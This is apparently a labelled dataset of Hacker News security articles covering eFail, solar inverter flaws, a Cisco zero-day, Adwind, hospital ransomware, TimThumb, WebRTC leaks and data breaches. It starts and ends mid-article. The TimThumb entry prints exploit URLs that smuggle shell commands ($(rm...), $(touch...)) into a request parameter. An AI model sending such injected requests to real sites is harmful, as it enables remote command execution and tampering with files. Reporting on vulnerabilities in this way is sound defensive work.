In the newly composed email, the attacker adds an unclosed image tag, like this , as clearly shown in the screenshot.
When your vulnerable email client receives this message, it decrypts the encrypted part of the message given in the middle, and then automatically tries to render the HTML content, i.e., the image tag with all the decrypted text as the new name of the image, as shown below.
Since your email client will try to load the image from the attacker-controlled server, the attacker can capture this incoming request, where the filename contains the full content of the original encrypted email in plaintext.
Although PGP has been designed to show you a warning note if the integrity of your email is compromised, a few email clients do not display these warnings, allowing any potential attackers to perform eFail attacks successfully.
How To Prevent Against eFail Attacks
Generally, it is a very tough job for an advisory to even intercept your encrypted emails, but for people desperately using email encryption always attract well-resourced and sophisticated attackers.
Ditching the use of PGP or S/MIME to prevent eFail attacks would be stupid advice, as it is quite easy to mitigate the reported issues.
Users can switch to a good email client that always shows a warning when the integrity of the emails is compromised and doesn't render HTML emails by default to prevent loading of external resources automatically.
Researchers also advise users to adopt an authenticated encryption algorithm for sensitive communication.
The research was conducted by a team of researchers, including Damian Poddebniak, Christian Dresen, Fabian Ising, and Sebastian Schinzel from Munster University of Applied Sciences; Jens Müller, Juraj Somorovsky, and Jörg Schwenk from Ruhr University Bochum; and Simon Friedberger from KU Leuven.
For more in-depth details on the attack technique, you can head on to this informational page about the eFail attack and the paper [PDF] titled, ""Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels,"" published by the researchers.
",Cyber_Attack
Critical Flaws Found in Solar Panels Could Shut Down Power Grids,https://thehackernews.com/2017/08/solar-panel-power-grid.html,"A Dutch security researcher has uncovered a slew of security vulnerabilities in an essential component of solar panels which could be exploited to cause widespread outages in European power grids.
Willem Westerhof, a cybersecurity researcher at Dutch security firm ITsec, discovered 21 security vulnerabilities in the Internet-connected inverters – an essential component of solar panel that turns direct current (DC) into alternating current (AC).
According to Westerhof, the vulnerabilities leave thousands of Internet-connected power inverters installed across Europe vulnerable.
Westerhof demonstrates that it is possible for hackers to gain control of a large number of inverters and switch them OFF simultaneously, causing an imbalance in the power grid that could result in power outages in different parts of Europe.
The vulnerabilities affect solar panel electricity systems, also known as photovoltaics (PV), made by German solar equipment company SMA, which if exploited in mass, could result in electrical grids getting knocked offline.
Westerhof's research, called the ""Horus Scenario"" – named after the Egyptian god of the sky, was first published in a Dutch newspaper Volkskrant, and now he launched a website detailing the vulnerabilities and how a digital attack could lead to terrible consequences.
According to the researcher, the attack causes due to an imbalance in the power grid. Since the power grid needs to maintain a constant balance between the supply of power and demand of power, an exceed in supply or demand could cause outages.
So, if an attacker manipulates the amount of PV power in a power grid at a particular time, an attacker could cause peaks or dips of several GigaWatts, causing a massive imbalance which may lead to large scale power outages.
For a country like Germany, where solar energy covers up to 50 percent of its power demand, such a devastating attack would instantly cause a significant power outage, which would adversely affect millions of people and cost governments billions of dollars.
To explain this scenario in real life, Westerhof analysed the PV inverters made by SMA and discovered 17 vulnerabilities, 14 of which received CVE IDs and CVSS scores ranging from 3 (Informational) to 9 (Critical).
""In the worst case scenario, an attacker compromises enough devices and shuts down all these devices at the same time causing threshold values to be hit"" and ""a 3 hour power outage across Europe, somewhere mid day on June is estimated to cause +/- 4.5 billion euros of damage,"" Westerhof writes.
Westerhof reported all the vulnerabilities to SMA in late 2016 and worked with the company, power grid regulators, and government officials to fix the issues and harden up the security of their systems.
More than six months later, the company patched the flaws in its kit and is rolling out patches to its customers, while power grid regulators and the government will discuss the findings at international conferences.
Luckily it was a white hat who discovered the flaws in the solar panel which could have caused a devastating effect on the entire nation. If it were a black hat, it could have resulted in massive power outages across Europe similar to the one suffered by Ukraine last year.
",Vulnerability
Cisco Issues Warning Over IOS XR Zero-Day Flaw Being Targeted in the Wild,https://thehackernews.com/2020/09/cisco-issue-warning-over-ios-xr-zero.html,"Cisco has warned of an active zero-day vulnerability in its router software that's being exploited in the wild and could allow a remote, authenticated attacker to carry out memory exhaustion attacks on an affected device.
""An attacker could exploit these vulnerabilities by sending crafted IGMP traffic to an affected device,"" Cisco said in an advisory posted over the weekend.
""A successful exploit could allow the attacker to cause memory exhaustion, resulting in instability of other processes. These processes may include, but are not limited to, interior and exterior routing protocols.""
Although the company said it will release software fixes to address the flaw, it did not share a timeline for when it plans to make it available. The networking equipment maker said it became aware of attempts to exploit the flaw on August 28.
Tracked as CVE-2020-3566, the severity of the vulnerability has been rated ""high"" with a Common Vulnerability Scoring System score of 8.6 out of a maximum 10.
The bug affects all Cisco gear running its Internetwork Operating System (IOS) XR Software and stems from an issue in the Distance Vector Multicast Routing Protocol (DVMRP) feature that makes it possible for an adversary to send specially crafted Internet Group Management Protocol (IGMP) packets to the susceptible device in question and exhaust process memory.
IGMP is typically used to efficiently use resources for multicasting applications when supporting streaming content such as online video streaming and gaming. The flaw lies in the manner IOS XR Software queues these packets, potentially causing memory exhaustion and disruption of other processes.
While there are no workarounds to resolve the issue, Cisco recommends administrators to run the ""show igmp interface"" command to determine if multicast routing is enabled.
""If the output of 'show igmp interface' is empty, multicast routing is not enabled and the device is not affected by these vulnerabilities,"" the company said.
Additionally, admins can also check the system logs for signs of memory exhaustion and implement rate-limiting to reduce IGMP traffic rates to mitigate the risk.
Cisco didn't elaborate on how the attackers were exploiting this vulnerability and with what goal in mind.
But given that resource exhaustion attacks are also a form of denial-of-service attacks, it wouldn't be surprising if bad actors are leveraging the flaw to interfere with the regular functioning of the system.
",Vulnerability
Adwind RAT Returns! Cross-Platform Malware Targeting Aerospace Industries,https://thehackernews.com/2017/07/adwind-rat-malware.html,"Hackers and cyber criminals are becoming dramatically more adept, innovative, and stealthy with each passing day.
While other operating systems are more widely in use, cybercriminals have now shifted from traditional activities to more clandestine techniques that come with limitless attack vectors, support for cross platforms and low detection rates.
Security researchers have discovered that infamous Adwind, a popular cross-platform Remote Access Trojan written in Java, has re-emerged and currently being used to ""target enterprises in the aerospace industry, with Switzerland, Austria, Ukraine, and the US the most affected countries.""
Adwind — also known as AlienSpy, Frutas, jFrutas, Unrecom, Sockrat, JSocket, and jRat — has been in development since 2013 and is capable of infecting all the major operating systems, including Windows, Mac, Linux, and Android.
Adwind has several malicious capabilities including stealing credentials, keylogging, taking pictures or screenshots, data gathering and exfiltrate data. The trojan can even turn infected machines into botnets to abuse them for destructing online services by carrying out DDoS attacks.
Researchers from Trend Micro recently noticed a sudden rise in the number of Adwind infections during June 2017 — at least 117,649 instances in the wild, which is 107 percent more than the previous month.
According to a blog post published today, the malicious campaign was noticed on two different occasions.
First was observed on June 7 and used a link to divert victims to their .NET-written malware equipped with spyware capabilities, while the second wave was noticed on June 14 and used different domains hosting their malware and command-and-control servers.
Both waves eventually employed a similar social engineering tactic to trick victims into clicking the malicious links within a spam email that impersonate the chair of the Mediterranean Yacht Broker Association (MYBA) Charter Committee.
Once infected, the malware also collects system's fingerprints, along with the list of installed antivirus and firewall applications.
""It can also perform reflection, a dynamic code generation in Java. The latter is a particularly useful feature in Java that enables developers/programmers to dynamically inspect, call, and instantiate attributes and classes at runtime. In cybercriminal hands, it can be abused to evade static analysis from traditional antivirus (AV) solutions,"" the researchers wrote.
My advice for users to remain protected from such malware is always to be suspicious of uninvited documents sent over an email and never click on links inside those documents unless verifying the source.
Additionally, keep your systems and antivirus products up-to-date in order to protect against any latest threat.
",Malware
A Patient Dies After Ransomware Attack Paralyzes German Hospital Systems,https://thehackernews.com/2020/09/a-patient-dies-after-ransomware-attack.html,"German authorities last week disclosed that a ransomware attack on the University Hospital of Düsseldorf (UKD) caused a failure of IT systems, resulting in the death of a woman who had to be sent to another hospital that was 20 miles away.
The incident marks the first recorded casualty as a consequence of cyberattacks on critical healthcare facilities, which has ramped up in recent months.
The attack, which exploited a Citrix ADC CVE-2019-19781 vulnerability to cripple the hospital systems on September 10, is said to have been ""misdirected"" in that it was originally intended for Heinrich Heine University, according to an extortion note left by the perpetrators.
After law enforcement contacted the threat actors and informed them that they had encrypted a hospital, the operators behind the attack withdrew the ransom demand and provided the decryption key.
The case is currently being treated as a homicide, BBC News reported over the weekend.
Unpatched Vulnerabilities Become Gateway to Ransomware Attacks
Although several ransomware gangs said early on in the pandemic that they would not deliberately target hospitals or medical facilities, the recurring attacks prompted the Interpol to issue a warning cautioning hospitals against ransomware attacks designed to lock them out of their critical systems in an attempt to extort payments.
Weak credentials and VPN vulnerabilities have proven to be a blessing in disguise for threat actors to break into the internal networks of businesses and organizations, leading cybersecurity agencies in the U.S. and U.K. to publish multiple advisories about active exploitation of the flaws.
""The [Federal Office for Information Security] is becoming increasingly aware of incidents in which Citrix systems were compromised before the security updates that were made available in January 2020 were installed,"" the German cybersecurity agency said in an alert last week.
""This means that attackers still have access to the system and the networks behind it even after the security gap has been closed. This possibility is currently increasingly being used to carry out attacks on affected organizations.""
The development also coincides with a fresh advisory from the U.K. National Cyber Security Centre (NCSC), which said it's observed an uptick in ransomware incidents targeting educational institutions at least since August 2020, while urging schools and universities to implement a ""defence in depth"" strategy to defend against such malware attacks.
Some of the affected institutions included Newcastle and Northumbria Universities, among others.
Citing Remote Desktop Protocol (RDP), vulnerable software or hardware, and email phishing as the three most common infection vectors, the agency recommended organizations to maintain up-to-date offline backups, adopt endpoint malware protection, secure RDP services using multi-factor authentication, and have an effective patch management strategy in place.
A Spike in Ransomware Infections
If anything, the ransomware crisis seems to be only getting worse. Historical data gathered by Temple University's CARE cybersecurity lab has shown that there have been a total of 687 publicly disclosed cases in the U.S. since 2013, with 2019 and 2020 alone accounting for more than half of all reported incidents (440).
Government facilities, educational institutions, and healthcare organizations are the most frequently hit sectors, as per the analysis.
And if 2020 is any indication, attacks against colleges and universities are showing no signs of slowing down.
Allan Liska, a threat intelligence analyst at Recorded Future, revealed there had been at least 80 publicly reported ransomware infections targeting the education sector to date this year, a massive jump from 43 ransomware attacks for the whole of 2019.
""Part of this change can be attributed to extortion sites, which force more victims to announce attacks,"" Liska said in a tweet. ""But, in general, ransomware actors have more interest in going after colleges and universities, and they are often easy targets.""
You can read more about NCSC's mitigation measures here. For more guidance on proofing businesses against ransomware attacks, head to US Cybersecurity Security and Infrastructure Security Agency's response guide here.
",Cyber_Attack
Microsoft Release Security Intelligence Report !,https://thehackernews.com/2011/05/microsoft-release-security-intelligence.html,"Microsoft Release Security Intelligence Report !
The Security Intelligence Report (SIR) is an investigation of the current threat landscape.
It analyzes exploits, vulnerabilities, and malware based on data from over 600 million systems worldwide, as well as internet services, and three Microsoft Security Centers.
Volume 10 (SIR v10) is the most current edition covering 2010 and contains five sections:
Key Findings provides data and analysis produced by Microsoft security teams.
Reference Guide gives additional information for topics covered in the Key Findings.
Featured Intelligence spotlights the latest threat topic.
Global Threat Assessment provides deep dive telemetry by specific country or region.
Managing Risk offers methods for protecting your organization, software, and people.
Download Here
",Malware
Secunia CSI 7.0 - Next generation Patch Management tool released,https://thehackernews.com/2013/09/Secunia-CSI-7-Patch-Management-tool_4.html,"Cybercrime costs organizations millions of dollars and to protect business from the consequences of security breaches, vulnerability intelligence and patch management are basic necessities in the toolbox of any IT team, as emphasized by organizations like the SANS Institute and the National Institute of Standards and Technology under the US Department of Commerce (NIST).
The Secunia CSI 7.0 is the Total Package: Vulnerability Intelligence, Vulnerability Scanning with Patch Creation and Patch Deployment Integration.
To help IT teams counter the threat, vulnerability research company Secunia merges the in-house vulnerability expertise with a sophisticated patch management solution into the Secunia Corporate Software Inspector (CSI 7.0). The foundation of the Secunia CSI is a unique combination of vulnerability intelligence and vulnerability scanning, with patch creation and patch deployment integration.
The Secunia CSI integrates with Microsoft WSUS and System Center 2012 and third-party configuration management tools for easy deployment of third-party updates, making patching a simple and straight-forward process for all IT departments.
To make the solution flexible and suited to the processes of organizations of all sizes the new version, the Secunia CSI 7.0, comes with these new and improved features:
Smart Groups 2.0: Create Smart Groups designed to prioritize remediation efforts by filtering and segmenting data based on hosts, products or impact, and to receive alerts when a threat is detected;
User Management: Create user accounts with different roles and permissions;
Patch Configuration: get configurable patches out-of-the-box that can be easily customized to support your environment, for example to avoid desktop shortcuts or to disable auto-update for a program
Web Console (SaaS): Log in to the Secunia CSI from an internet browser for instant access to your data and reports - anywhere, at any time.
Password Policy Configuration: Determine and enforce the global password policy for your organization to comply with internal and external policies as well as to meet best-practice standards in your industry.
Live updates: get an immediate overview of how a new vulnerability affects your infrastructure, as soon as the advisory has been released by Secunia Research, based on your latest scan results
PSI for Android: Scan Android devices for vulnerabilities with the Secunia PSI for Android, and integrate it with the Secunia CSI to support your BYOD policy.
Secunia SC2012 Plugin 2.0 for CSI integration with Microsoft System Center 2012. This add-on makes it possible to deploy all third-party updates directly in Microsoft System Center 2012.
Zero-Day Vulnerability Support. The add-on includes SMS or email alerts, whenever a new zero-day vulnerability is discovered that affects the particular IT infrastructure. This add-on is designed for the select organizations that have a sufficiently sophisticated security apparatus to enable them to act on the zero-day threat intelligence.
Why vulnerability intelligence is a crucial aspect of patch management
In 2012, Secunia recorded a total of nearly 10,000 discovered vulnerabilities in software programs, and more than 1,000 vulnerabilities in the 50 most popular programs alone Most of these (86%) were discovered in third-party (non-Microsoft) programs, presenting IT teams with the huge challenge of how to retain control over increasingly complex infrastructures and user device autonomy and identify, acquire, install and verify patches for all applications in all systems.
As vulnerabilities are the root cause of security issues, understanding how to deal with them is a critical component of protecting any organization from security breaches. IT teams must know when a vulnerability is threatening the infrastructure, where it will have the most critical impact, what the right remediation strategy is and how to deploy it.
These aspects of risk assessment fall to IT Security and IT Operations respectively, and the two departments require different sets of tools to take strategic, pre-emptive action against vulnerabilities.
""The new Secunia CSI bridges the gap between the two sets of requirements. Security teams need vulnerability intelligence and scanning to assess risk in a constantly changing threat landscape, and IT operations need a patch management solution that is sufficiently agile to maintain security levels without an impairing daily performance,"" explains Morten R. Stengaard, Secunia CTO.
""The core of our solution is the vulnerability intelligence delivered by Secunia's renowned in-house Research Team, who test, verify, and validate public vulnerability reports, as well as conduct independent vulnerability research on a variety of products. No other patch management solution out there can provide this expertise. To deliver the intelligence to our customers, we have created a patch management solution which is constantly evolving, to meet the changing requirements of our users,"" says Morten R. Stengaard.
Flexibility is the driving force behind the Secunia CSI 7.0
To ensure that the Secunia CSI 7.0 is primed to work as a conduit to Secunia's powerful vulnerability intelligence, scanning and patch management solution, flexibility has been the driving force behind the development of the Secunia CSI 7.0.
""Each organization is unique, with its own processes, regulatory standards and security procedures, and the improvements to the Secunia CSI 7.0 enables IT teams to adapt and scale the solution to match the requirements of virtually any organization,"" says Morten R. Stengaard.
",Vulnerability
10 year old girl hacker CyFi reveal her first zero-day in Game at #DefCon 19,https://thehackernews.com/2011/08/10-year-old-girl-hacker-cyfi-reveal-her.html,"10 year old girl hacker CyFi reveal her first zero-day in Game at #DefCon 19
Another awesome day at DefCon 19 . Today a 10 year old Girl hacker - pseudonym CyFi revealed her zero-day exploit in games on iOS and Android devices that independent researchers have confirmed as a new class of vulnerability. The 10-year-old girl from California first discovered the flaw around January 2011 because she ""started to get bored"" with the pace of farm-style games.
About CyFi :
She is cofounder of DEFCON Kids. CyFi is a ten-year-old hacker, artist and athlete living in California. She has spoken publicly numerous times, usually at art galleries as a member of ""The American Show,"" an underground art collective based in San Francisco. CyFi's first gallery showing was when she was four. Last year she performed at the SF MOMA Museum in San Francisco. DEFCON Kids will be her first public vulnerability disclosure. CyFi's has had her identity stolen twice. She really likes coffee, but her mom doesn't let her drink it.
CyFi said, ""It was hard to make progress in the game, because it took so long for things to grow. So I thought, 'Why don't I just change the time?'"" Most of the games she discovered the exploit in have time-dependent factors. Manually advancing the phone or tablet's clock forced the game further ahead than it really was, opening up the exploit.
CyFi said that she discovered some ways around those detections. Disconnecting the phone from Wi-Fi made it harder to stop, as did making incremental clock adjustments. CyFi's mother, who must remain anonymous to protect her daughter's identity, told at the end of CyFi's presentation at DefCon Kids that they would offer a $100 reward to the young hacker who found the most games with this exploit over the following 24 hours. The reward is sponsored by AllClearID, a identity protection company that is also sponsoring the DefCon Kids.
CyFi revealed that she was only a little bit nervous about having to speak in front of the 100 or so expected attendees. She admitted that while it was probably different publicly speaking about a topic with such a specific focus, it would be hard for her to imagine what those differences might be. ""Well, I haven't done it yet,"" she said.
",Vulnerability
Zero-Day TimThumb WebShot Vulnerability leaves Thousands of Wordpress Blogs at Risk,https://thehackernews.com/2014/06/zero-day-timthumb-webshot-vulnerability.html,"Yesterday we learned of a critical Zero-day vulnerability in a popular image resizing library called TimThumb, which is used in thousands WordPress themes and plugins.
WordPress is a free and open source blogging tool and a content management system (CMS) with more than 30,000 plugins, each of which offers custom functions and features enabling users to tailor their sites to their specific needs, therefore it is easy to setup and use, that's why tens of millions of websites across the world opt it.
But if you or your company are the one using the popular image resizing library called ""TimThumb"" to resize large images into usable thumbnails that you can display on your site, then you make sure to update the file with the upcoming latest version and remember to check the TimThumb site regularly for the patched update.
0-Day REMOTE CODE EXECUTION & NO PATCH
The critical vulnerability discovered by Pichaya Morimoto in the TimThumb Wordpress plugin version 2.8.13, resides in its ""Webshot"" feature that, when enabled, allows attackers to execute commands on a remote website.
The vulnerability allows an attacker to remotely execute arbitrary PHP code on the affected website. Once the PHP code has been executed, the website can be easily compromised in the way the attacker wants. Until now, there is no patch available for the flaw.
""With a simple command, an attacker can create, remove and modify any files on your server,"" says Security experts at Sucuri break in a blog post.
Using the following command, a hacker can create, delete and modify any files on your server:
https://vulnerablesite.com/wp-content/plugins/pluginX/timthumb.php?webshot=1&src=https://vulnerablesite.com/$(rm$IFS/tmp/a.txt)
https://vulnerablesite.com/wp-content/plugins/pluginX/timthumb.php??webshot=1&src=https://vulnerablesite.com/$(touch$IFS/tmp/a.txt)
WHO ARE VULNERABLE
Unfortunately, there are hundreds of other Wordpress plugins and themes, those are using TimThumb library by default. Some of theme are:
1.) TimThumb 2.8.13 Wordpress plugin
1.) WordThumb 1.07 is also using same vulnerable WebShot code.
2.) Wordpress Gallery Plugin
3.) IGIT Posts Slider Widget
4.) All Wordpress themes from Themify contains vulnerable wordthumb at ""/themify/img.php"" location.
The good news is that Timthumb comes with the webshot option disabled by default, so only those Timthumb installations are vulnerable to the flaw who have manually enabled the webshot feature.
CHECK AND DISABLE TIMTHUMB ""WEBSHOT""
Open timthumb file inside your theme or plugin directory, usually located at ""/wp-content/themes//path/to/timthumb.php""
Search for ""WEBSHOT_ENABLED""
If the you find define ('WEBSHOT_ENABLED', true) , then set the value to ""false"", i.e. define ('WEBSHOT_ENABLED', false)
Unfortunately, similar multiple security flaws were discovered in TimThumb in the past, leaving millions of WordPress powered websites vulnerable to attack.
",Vulnerability
WebRTC Vulnerability leaks Real IP Addresses of VPN Users,https://thehackernews.com/2015/02/webrtc-leaks-vpn-ip-address.html,"An extremely critical vulnerability has recently been discovered in WebRTC (Web Real-Time Communication), an open-source standard that enables the browsers to make voice or video calls without needing any plug-ins.
AFFECTED PRODUCTS
Late last month, security researchers revealed a massive security flaw that enables website owner to easily see the real IP addresses of users through WebRTC, even if they are using a VPN or even PureVPN to mask their real IP addresses.
The security glitch affects WebRTC-supporting browsers such as Google Chrome and Mozilla Firefox, and appears to be limited to Windows operating system only, although users of Linux and Mac OS X are not affected by this vulnerability.
HOW DOES THE WebRTC FLAW WORKS
WebRTC allows requests to be made to STUN (Session Traversal Utilities for NAT) servers which return the ""hidden"" home IP-address as well as local network addresses for the system that is being used by the user.
The results of the requests can be accessed using JavaScript, but because they are made outside the normal XML/HTTP request procedure, they are not visible in the developer console. This means that the only requirement for this to work is WebRTC support in the browser and JavaScript.
CHECK YOURSELF NOW
A demonstration published by developer Daniel Roesler on GitHub allows people to check if they are affected by the security glitch.
Also, you can go through the following steps in order to check if you're affected:
Connect to ExpressVPN
Visit https://ipleak.net
If your browser is secure, you should see something like this:
If your browser is affected by this issue, you'll see information about your true IP address in the WebRTC section.
HOW TO PROTECT YOURSELF
Luckily the critical security flaw is quite easy to fix.
For Chrome users :
Google Chrome and other Chromium-based browser users can install the WebRTC Block extension or ScriptSafe, which both reportedly block the vulnerability.
For Firefox Users :
In case of Firefox, the only extensions that block these look ups are JavaScript blocking extensions such as NoScript. To fix, try the following steps:
Type about:config in the browser's address bar and hit enter.
Confirm you will be careful if the prompt appears.
Search for media.peerconnection.enabled.
Double-click the preference to set it to false.
This turns of WebRTC in Firefox.
",Vulnerability
Boys Town Healthcare Data Breach Exposed Personal Details of Patients,https://thehackernews.com/2018/07/data-breach-healthcare.html,"Another day, Another data breach!
This time-sensitive and personal data of hundreds of thousands of people at Boys Town National Research Hospital have been exposed in what appears to be the largest ever reported breach by a pediatric care provider or children's hospital.
According to the U.S. Department of Health and Human Services Office for Civil Rights, the breach incident affected 105,309 individuals, including patients and employees, at the Omaha-based medical organization.
In a ""Notice of Data Security Incident"" published on its website, the Boys Town National Research Hospital admitted that the organization became aware of an abnormal behavior regarding one of its employees' email account on May 23, 2018.
After launching a forensic investigation, the hospital found that an unknown hacker managed to infiltrate into the employee's email account and stole personal information stored within the email account as a result of unauthorized access.
The hacker accessed the personal and medical data of more than 100,000 patients and employees, including:
Name
Date of birth
Social Security number
Diagnosis or treatment information
Medicare or Medicaid identification number
Medical record number
Billing/claims information
Health insurance information
Disability code
Birth or marriage certificate information
Employer Identification Number
Driver's license number
Passport information
Banking or financial account number
Username and password
With this extensive information in hand, it's most likely that hackers are already selling personal information of victims on the dark web or attempting to carry out further harm to them, particularly child patients at the hospital.
However, The Boys Town National Research Hospital says it has not received any reports of the misuse of the stolen information so far.
""Boys Town takes this incident and the security of personal information seriously. Upon learning of this incident, Boys Town moved quickly to confirm whether personal information may have been affected by this incident, to identify the individuals related to this personal information, to put in place resources to assist them, and to provide them with notice of this incident,"" the hospital says.
The hospital has also reported the incident to law enforcement and is notifying state and federal regulators, along with potentially affected individuals. Boys Town has also promised to offer affected individuals access to 12 months of free identity protection services.
Boys Town hospital is also reviewing its existing policies and procedures and is implementing some additional security measures to safeguard its users' information stored in its systems.
However, victims are highly recommended to monitor their accounts for any fraudulent transaction and should consider placing a credit freeze request. Here's how you can freeze credit report to protect yourself against identity theft.
For additional information related to the incident, you can call 1-855-686-9425 (toll-free), Monday through Saturday from 8:00 a.m. to 8:00 p.m. CT.
",Cyber_Attack
Gauss Malware Detection Tool released by Iranian CERT,https://thehackernews.com/2012/09/gauss-malware-detection-tool-released.html,"Iranian National Computer Emergency Response Team releases a tool for Gauss malware detection. Cyber surveillance virus has been found in the Middle East that can spy on banking transactions and steal login and passwords, according Kaspersky Lab, a leading computer security firm.
Gauss primarily infects 32-bit versions of Windows, though a separate spy module for USB drives can collect information from 64-bit systems. Infections are mainly split between Windows 7 and Windows XP, although some of the Gauss modules don't work against Windows 7 Service Pack 1. Mac and Linux machines appear to be safe.
Multiple modules of Gauss serve the purpose of collecting information from browsers, which include the history of visited websites and passwords. Detailed data on the infected machine is also sent to the attackers, including specifics of network interfaces, the computer's drives and BIOS information.
The Gauss module is also capable of stealing data from the clients of several Lebanese banks including the Bank of Beirut, EBLF, BlomBank, ByblosBank, FransaBank and Credit Libanais. It also targets users of Citibank and PayPal.
Download Gauss Malware Detection Tool from Iran CERT.
Another Similar Tools are : Kaspersky virus removal tool, or use a Web page provided by Hungarian research lab CrySyS to scan for the virus. The CrySyS page will check your system for Palida Narrow, a font associated with Gauss.
",Malware
New Internet Explorer Zero-Day Vulnerability Publicly Disclosed; Identified in October 2013,https://thehackernews.com/2014/05/internet-explorer-zero-day.html,"Oh Microsoft, How could you do this to your own Internet Explorer? Microsoft had kept hidden a critical Zero-Day vulnerability of Internet explorer 8 from all of us, since October 2013.
A Critical zero-day Internet Explorer vulnerability (CVE-2014-1770), which was discovered by Peter 'corelanc0d3r' Van Eeckhoutte in October 2013 just goes public today by the Zero Day Initiative (ZDI) website.
Zero Day Initiative is a program for rewarding security researchers for responsibly disclosing vulnerabilities. ZDI reportedly disclosed the vulnerability to Microsoft when it was first identified by one of its researchers, on which Microsoft responded 4 month later on February 2014 and confirmed the flaw, but neither the Microsoft patch the vulnerability nor it disclosed any details about it.
But due to ZDI's 180 days public notification policy, they are obligated to publicly disclosed the details of a Zero-Day vulnerability. ZDI warned Microsoft several days ago about the pending public disclosure of the flaw after it completed 180 days as on April, but apparently Microsoft didn't respond to it.
According to the ZDI Security Advisory, the vulnerability is a zero day remote code execution flaw that affects the Internet Explorer version 8 and allows a remote attacker to execute arbitrary code through a bug in CMarkup objects.
In a web-based attack scenario, an attacker could leverage the Vulnerability through compromise websites and by clicking on email attachments. To perform successful web-based attacks, an attacker can host specially crafted content on the compromised websites that could trigger the reported vulnerability.
""In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by getting them to click a link in an email message or in an Instant Messenger message that takes users to the attacker's website, or by getting them to open an attachment sent through email,"" reads the ZDI post.
By successful exploitation of the flaw, an attacker could gain the same user rights as the current user on the compromised system and victim 'users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.'
If you are using Microsoft Outlook, Microsoft Outlook Express, or Windows Mail to open HTML emails, then it automatically disables the Script and ActiveX controls, that helps reduce the risk of an attacker being able to use these vulnerabilities to execute malicious code.
But once the user clicks any malicious link attached with the email messages, he or she would fall victim for the exploitation of these vulnerabilities through the web-based attacks.
Moreover, Windows Server 2003, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, and Windows Server 2012 R2 users should not worry if they have Enhanced Security Configuration enabled on their Internet Explorer, because this mode mitigates these vulnerabilities.
The vulnerability has not been addressed by Microsoft and no patch is available yet for this critical zero day vulnerability, so Internet Explorer user are still vulnerable to the zero-day attack.
You are advised to block ActiveX Controls and Active Scripting and also install EMET (Enhanced Mitigation Experience Toolkit), that enable you to manage security mitigation technologies that help make it more difficult for attackers to exploit vulnerabilities in a given piece of software.
Just few days back, a similar remote code execution vulnerability in the Internet Explorer that affected almost all the versions of IE was reported by the security firm FireEye.
",Vulnerability
These Top 7 Brutal Cyber Attacks Prove 'No One is Immune to Hacking' — Part II,https://thehackernews.com/2015/09/top-cyber-attacks-2.html,"In Part I of this two-part series from The Hacker News, the First Four list of Top Brutal Cyber Attacks shows that whoever you are, Security can never be perfect.
As attackers employ innovative hacking techniques and zero-day exploits, the demand for increased threat protection grows.
In this article, I have listed another three cyber attacks, as following:
#5 Car Hacking
Driving a car is a network's game now!
'Everything is hackable,' but is your car also vulnerable to Hackers?
General Motors' OnStar application and cars like Jeep Cherokee, Cadillac Escalade, Toyota Prius, Dodge Viper, Audi A8 and many more come equipped with more advanced technology features.
These cars are now part of the technology very well known as the ""Internet of Things"".
Recently two Security researchers, Chris Valasek and Charlie Miller demonstrated that Jeep Cherokee could be hacked wirelessly over the internet to hijack its steering, brakes, and transmission.
The OnStar application is an inbuilt unit attached to the interior, rearview mirror of the car with features such as remotely unlocking cars and starting the engines.
Similarly, Jeep manufactured Jeep Cherokee's latest model is the fourth generation car fully equipped with the latest technology advancements.
In the recent incidents, Jeep Cherokee, as well as OnStar's application, were hacked leaving the cars as the slaves of the hackers and prone to accidents.
A security flaw in the car's entertainment system was compromised by two white hat hackers: Charlie Miller and Chris Valasek. The flaw allowed the hackers to inject malware into the system for remote control from miles away.
The hackers were able to turn up the music volume to the maximum and start the windshield wipers remotely while they were '10 miles away'.
An outrageous act they did was cutting off the transmission and disconnected the brakes that led the car crash into a ditch.
Reports say that both Jeep Cherokee and Escalade have an inherent security flaw. This is such:
The cars' apps, Bluetooth and telematics connecting the car to a cellular network like OnStar are on the same network as the engine controls, brakes, steerings and tire pressure monitor system.
Miller and Valasek said a car's networked system could be an easy gateway for the hackers to come in with just the use of their mobile phones and a laptop.
What they need to do is just know the car's IP address, and they can break into its system through a wireless internet connection.
#6 Data Breach at US Government Office of Personnel Management
United States Office of Personnel Management (US OPM) is an independent agency of the United States that works to recruit, retain and honor a world-class workforce for the American people.
The US OPM became a victim of a cyber attack twice that led to a data breach, compromising personal information of some 21.5 million related to current and former federal workers.
Hackers accessed sensitive data of US government officials that could be used for identity theft and cyber-espionage.
The stolen data included Social Security Numbers, employment history, residency and educational history, criminal and financial history, fingerprints, information about health, personal and business acquaintances.
Some stolen records also include findings from interviews conducted by background investigators that discussed sexual assaults and drug, mental health treatments and alcohol addictions.
Investigations reveal that China-based hackers were behind the data breaches at the Office of Personnel Management (OPM).
#7 Anthem Data Breach
Anthem Insurance Inc., previously known as WellPoint Inc, was a victim of a massive cyber attack in February.
Back in February, Cyber attackers executed a very sophisticated attack to gain unauthorized access to the company's IT systems that had database of some 80 million people and obtained personal identifiable information (PII) relating to its consumers and employees.
The information accessed included:
Names,
Birthdays,
Social security numbers,
Email addresses
Employment information, including income data
The hackers gained access to Anthem's data by stealing the network credentials of at least five of its employees with high-level IT access.
The path may have been ""Phishing"", in which a fraudulent e-mail could have been used to trick employees into revealing their network ID and password, or into unknowingly downloading software code that gives the hackers long-term access to Anthem's IT environment.
The company informed millions of its affected customers of the massive data breach that potentially exposed the personal information of its former as well as current customers.
Anthem appointed Mandiant, world's leading cyber security organization, to evaluate the scenario and provide necessary solutions.
This is just the beginning...
These are just seven; there are many more! And it could reach you too.
The power of the cyberspace and the criminals hovering over it should not be underrated.
Chucking such happenings where your personal data is at risk and being irrational is not the solution rather it is the beginning of activities that will bother you big time in the future.
The cyberspace is like a dope that is capable of psychoactive effects. A proactive thinking and approach will take you ahead of the people on the other end.
Take the time to ponder over the incidents and respond wisely is all we have to say!
",Cyber_Attack
Another Google Chrome 0-Day Bug Found Actively Exploited In-the-Wild,https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html,"Google has addressed yet another actively exploited zero-day in Chrome browser, marking the second such fix released by the company within a month.
The browser maker on Friday shipped 89.0.4389.90 for Windows, Mac, and Linux, which is expected to be rolling out over the coming days/weeks to all users.
While the update contains a total of five security fixes, the most important flaw rectified by Google concerns a use after free vulnerability in its Blink rendering engine. The bug is tracked as CVE-2021-21193.
